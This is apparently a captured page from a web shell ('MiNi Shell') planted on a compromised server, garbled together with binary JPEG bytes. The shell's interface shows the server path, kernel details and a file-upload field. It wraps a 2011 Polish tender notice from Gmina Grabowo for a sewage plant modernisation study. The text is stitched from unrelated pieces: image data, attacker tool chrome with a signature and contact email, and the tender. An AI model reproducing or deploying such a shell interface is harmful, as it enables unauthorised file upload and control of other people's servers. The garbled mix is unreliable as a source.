JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110413/76420-N-2011.html

<p class="kh_header"><b>Grabowo: Opracowanie wielowariantowej koncepcji modernizacji i remontu oczyszczalni ścieków w Grabowie</b><br>
<b>Numer ogłoszenia: 76420 - 2011; data zamieszczenia: 13.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grabowo , ul. Wł. Sikorskiego 1, 18-507 Grabowo, woj. podlaskie, tel. 086 2790021, faks 086 2790021.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie wielowariantowej koncepcji modernizacji i remontu oczyszczalni ścieków w Grabowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie wielowariantowej koncepcji modernizacji i remontu oczyszczalni Ścieków w Grabowie opartej na technologii osadu czynnego z biologiczną eliminacją substancji biogennych wraz z ilościowo-jakościowym bilansem ścieków uwzględniającym stan istniejący i przyszły rozwój miejscowości. Koncepcja będzie elementem realizacji zadania: Uporządkowanie gospodarki wodno-ściekowej na terenie Gminy Grabowo. Opracowanie kompletnej dokumentacji projektowej wraz z odpowiednimi uzgodnieniami potrzebnymi do uzyskania pozwolenia na budowę na remont (modernizację) oczyszczalni ścieków w Grabowie.  1.1. Koncepcja powinna zawierać kompleksowe rozwiązania zagadnienia oczyszczania ścieków i przeróbki osadów, w dwóch wariantach techniczno - technologicznych.  1.2. Koncepcja powinna spełniać obowiązujące wymagania formalno - prawne, a w szczególności: a) efekty oczyszczania ścieków muszą spełniać wymagania określone w Ustawie z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2005r. Nr 239, poz. 2019 z późniejszymi zmianami), b) rozwiązanie utylizacji odpadów powstających w procesie oczyszczania ścieków muszą spełniać warunki określone w Ustawie o odpadach z dnia 27 kwietnia 2001r. z późniejszymi zmianami (Dz. U. 2007. Nr 39 poz. 251), c) dla emisji hałasu, wibracji, promieniowania, odorów i aerozoli powstających w procesie oczyszczania ścieków muszą być spełnione warunki określone w Ustawie Prawo ochrony środowiska z dnia 27 kwietnia 2001 r. z późniejszymi zmianami (Dz. U . z 2008r. Nr 25, poz. 150), d) dla korzystania z wód powierzchniowych muszą być spełnione warunki określone w Ustawie z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2005r. Nr 239, poz. 2019 z późniejszymi zmianami), e) Rozporządzenia Ministra Środowiska z dnia 28.01.2009 (Dz. U. 2009r. nr 27 poz. 169) roku w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego.  1.3. Aktualne, obejmujące zakres opracowania mapy sytuacyjno - wysokościowe z naniesionym uzbrojeniem w skali 1:500 dla celów opracowania koncepcji zleca w ramach oferowanej ceny wykonawca, któremu zostało udzielone zamówienie objęte niniejszą specyfikacją istotnych warunków zamówienia.  1.4. Opracowanie koncepcji winno być poprzedzone szczegółową analizą stanu istniejącego, aktualizacją bilansu zarówno ilościowego jak i jakościowego ścieków doprowadzanych obecnie do oczyszczalni. Bilans winien dotyczyć stanu obecnego i perspektywicznego wszystkich ścieków komunalnych pochodzących z terenu aglomeracji Grabowa. Bilans winien być zatwierdzony przez Zamawiającego.  1.5. Docelowa przepustowość oraz obciążenie ładunkiem oczyszczalni będzie wynikać z  opracowanego bilansu ścieków i konsultacji z Zamawiającym.  1.6. Wymaga się opracowania koncepcji modernizacji oczyszczalni w ramach terenów zagospodarowanych pod istniejącą oczyszczalnię ścieków w Grabowie ( nie wykluczając terenów przyległych).  1.7. Wykonawca zobowiązany będzie do zwoływania narad roboczych w razie. Narady robocze odbywać się będą w siedzibie Zamawiającego  2.  Zakres oraz warunki techniczne, jakim powinna odpowiadać koncepcja modernizacji i remontu oczyszczalni ścieków w Grabowie.  2.1. Opracowanie wielowariantowej koncepcji remontu i modernizacji oczyszczalni ścieków w Grabowie  wraz z bilansem ścieków: Podejścia do istniejących obiektów i infrastruktury: Koncepcja powinna ocenić przydatność istniejących obiektów do wykorzystania w proponowanej technologii i przewidzieć ewentualny zakres ich remontu lub modernizacji. Podejście do sposobu opracowania koncepcji zgodnie z określoną technologią. Koncepcja powinna opierać się na najnowszej wiedzy technicznej, obejmować zastosowanie równoległych ciągów technologicznych. Założenia w koncepcji powinny uwzględniać nieprzerwaną pracę obiektów przy modernizacji oraz etapowość realizacji inwestycji.  2.2. Zamawiający wymaga otrzymania minimum: a) dwóch wariantów koncepcji wraz z bilansem ilościowo- jakościowym ścieków wykonanych w czytelnej technice tekstowej, obliczeniowej i graficznej oraz wariantu zaniechania, oprawionych w okładki formatu A 4 w sposób uniemożliwiający dekompletację w ilości 3 kpl (każda z osobna) oraz materiałów niezbędnych do wystąpienia z wnioskiem o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia i decyzji o ustaleniu lokalizacji inwestycji celu publicznego zawierających m.in. ocenę i raport oddziaływania inwestycji na środowisko, operat wodnoprawny (opracowany w oparciu o wybrany wariant) w ilości 3 egz. b) wersji elektronicznej w/w koncepcji na nośnikach CD/DVD - 2 szt., w programach umożliwiających edycję dokumentów (Word, EXEL, JPG, PDF); c) opracowane dokumenty musza być dostarczone do siedziby Zamawiającego.  2. 3. Zawartość dokumentacji projektowej: 1) projekt budowlano-wykonawczy - 5 egz. 2) informacja dotycząca bezpieczeństwa i ochrony zdrowia - 5 egz. 3) część kosztorysowa: a) przedmiar robót - 4 egz. b) kosztorys inwestorski - 2 egz. 4) specyfikacja techniczna wykonania i odbioru robót - 2 egz. Do kompletu dokumentacji projektowej należy dołączyć płytę CD z zapisem elektronicznym kompletnej dokumentacji w formie PDF, przy czym kosztorys inwestorski i przedmiar robót należy sporządzić na oddzielnej płycie. Wykonawca winien uzyskać wszelkie materiały wyjściowe do projektowania we własnym zakresie. Wykonawca odpowiadać będzie wobec Zamawiającego za wady fizyczne i prawne projektu, a w szczególności za to, że zamówienie będzie realizowane zgodnie z parametrami technicznymi obowiązującymi na dzień złożenia projektu..  3. Warunki techniczne, jakim powinna odpowiadać koncepcja objęta zamówieniem publicznym.  3.1. Koncepcje muszą zawierać ocenę urządzeń pod względem dalszej eksploatacji i przydatności z uwzględnieniem przebudowy-remontu pracującego bloku oraz montaż nowych urządzeń. Powinny uwzględniać zwiększenie przepustowości oczyszczalni - dostosowanie do istniejących warunków z uwzględnieniem dodatkowych wpięć w związku z rozbudową kanalizacji w aglomeracji Grabowa ewentualnie okolic.  3.1.1. W wyniku przebudowy istniejącej oczyszczalni ścieków Zamawiający chciałby uzyskać m.in.: - Równomierny dopływ ścieków do oczyszczalni. - Prawidłowe rozwiązanie mechanicznego oczyszczenia ścieków dopływających do obiektu w tym budynek krat, automatyczny punkt zlewny ścieków dowożonych,  układ korekty ph ścieku surowego, układ higienizacji skratek, piaskownik, odtłuszczacz. - Na wypadek awarii uwzględnić drugi równoległy blok technologiczny w technologii np. napowietrzania powierzchniowego lub inne racjonalne rozwiązanie. - Niezależne osadniki np. radialne wtórne. - Wykorzystanie energii cieplnej i elektrycznej wytwarzanej w procesie oczyszczania ścieków na potrzeby własnej działalności. - Uporządkowanie gospodarki odpadowej dla odpadów powstających z procesów oczyszczania ścieków. - Modernizację układu sterowania i automatyki. - Pomiar przepływu wraz z samplerem do poboru prób ścieków.  3.1.2 W odniesieniu do procesu biologicznego oczyszczania ścieków: - Proponuje się wykonanie koncepcji oczyszczalni ścieków w technologii osadu czynnego z biologiczną eliminacją substancji biogennych. - Uwzględnić odzysk powstającego gazu pofermentacyjnego z wykorzystaniem do celów grzewczych i energetycznych. Przewidzieć ograniczenie oddziaływania na otoczenie (hermetyzacja uciążliwych obiektów, dezodoryzacja itp.). - Rozwiązać ciąg odwadniania osadu, sposobu zagospodarowania powstającego osadu, jego przeróbki i składowania. - W zależności od zaproponowanych rozwiązań w koncepcji przewidzieć niezbędne wyposażenie ruchome do zapewnienia prowadzenia procesu oczyszczania.  3.2. Koncepcja w rozumieniu niniejszego przetargu nieograniczonego jest opracowaniem wielofazowym. Wielofazowość koncepcji polega na tym, że w zakresie swoim musi ona obejmować: Przygotowanie wszystkich materiałów niezbędnych do skutecznego złożenia wniosków o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia oraz decyzji lokalizacji inwestycji celu publicznego (w oparciu o najbardziej efektywny wybrany wariant). Obowiązkiem Wykonawcy będzie uzupełnić wymagane dokumenty w przypadku takiej konieczności warunkujące wydanie wyżej wymienionych decyzji. Zamawiający dokona wyboru ostatecznego rozwiązania celem przygotowania wyszczególnionych dokumentów w ciągu 14 dni od dnia otrzymania wielowariantowej koncepcji. Wykonawca przedstawi warianty koncepcji do wyboru Zamawiającemu do dnia 30.06.2011r.  3.3. Koncepcja powinna zawierać m.in.: a) lokalizację inwestycji, b) wymagania terenu pod inwestycję z jego charakterystyką, c) inwentaryzację stanu istniejącego kompleksu oczyszczalni, d) szczegółowy opis przyjętych rozwiązań techniczno - technologicznych: - zagospodarowanie terenu, - technologię oczyszczania ścieków, utylizacji osadów i pozostałych odpadów wytwarzanych w procesie oczyszczania ścieków, - branżę budowlaną, - urządzenia i wyposażenie technologiczne, - rurociągi i kanały technologiczne, e) opis inwestycji towarzyszących do inwestycji podstawowej, f) opis skutków inwestycji dla środowiska i projektowane przeciwdziałania, g) część kosztową - Zbiorcze Zestawienie Kosztów przedsięwzięcia dla dwóch wariantów wraz z oszacowaniem kosztów eksploatacyjnych w odrębnym zestawieniu.  3.4. W ramach kosztów podanych w cenie ofertowej należy uwzględnić wszystkie koszty towarzyszące opracowaniu koncepcji z racji celu, któremu ma służyć tj. m.in. pozyskanie map, niezbędne badania geotechniczne oraz udział w radach technicznych organizowanych w siedzibie Zarządcy.  3.5. Koncepcja powinna zawierać rozwiązania minimalizujące koszty eksploatacji oczyszczalni, a także ograniczające do minimum uciążliwość oczyszczalni dla środowiska. UWAGA: Powyżej podano ogólne wymogi w zakresie czynności jakie należy wykonać w trakcie opracowywania koncepcji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie badania oświadczeń i dokumentów, zgodnie z formułą, spełnia / nie spełnia warunków udziału w postępowaniu. W przypadku wykonawców składających wspólną ofertę warunek ten winien spełniać co najmniej jeden z podmiotów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 dostaw / usług w zakresie przewidzianym w zamówieniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
co najmniej jedną dokumentację /dotyczy projektów br. technologicznej, elektrycznej i AKPiA, drogowej/ obejmującą swoim zakresem gospodarkę ściekową i osadową w obiektach oczyszczalni o podobnych parametrach, z podaniem wartości, przedmiotu /zakres opracowania projektu wraz z podaniem parametrów ścieków oczyszczonych uzyskiwanych na wylocie z oczyszczalni/, daty wykonania i odbiorców, oraz z załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie.
Zamawiający dokona oceny spełniania w/w warunku udziału w postępowaniu na podstawie badania kompletności i zgodności ze SIWZ złożonych w ofercie dokumentów, zgodnie z formułą spełnia / nie spełnia warunków udziału w postępowaniu. W przypadku wykonawców składających wspólną ofertę warunek ten winien spełniać co najmniej jeden z podmiotów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania w/w warunku udziału w postępowaniu na podstawie badania kompletności i zgodności ze SIWZ złożonych w ofercie dokumentów, zgodnie z formułą spełnia / nie spełnia warunków udziału w postępowaniu. W przypadku wykonawców składających wspólną ofertę warunek ten winien spełniać co najmniej jeden z podmiotów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie musi dysponować osobami posiadającymi uprawnienia niezbędne do wykonania zamówienia oraz  dołączy dokumenty potwierdzające ich kwalifikacje i doświadczenie zawodowe. Zamawiający dokona oceny spełniania w/w warunku udziału w postępowaniu na podstawie badania kompletności i zgodności ze SIWZ złożonych w ofercie dokumentów, zgodnie z formułą spełnia / nie spełnia warunków udziału w postępowaniu. W przypadku wykonawców składających wspólną ofertę warunek ten winien spełniać co najmniej jeden z podmiotów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	oryginał pełnomocnictwa udzielanego osobom podpisującym ofertę o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika  wprost z dokumentu rejestrowego,
2.	w przypadku składania ofert przez konsorcjum do ofert należy dołączyć dokument ustanawiający pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
3.	potwierdzenie przez Zamawiającego dokonania wizji lokalnej przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug-grabow.pbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Grabowo
ul. Gen. Wł. Sikorskiego 1
18-507 Grabowo
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 12:00, miejsce: Urząd Gminy Grabowo
ul. Gen. Wł. Sikorskiego 1
18-507 Grabowo
pokój nr 11- SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com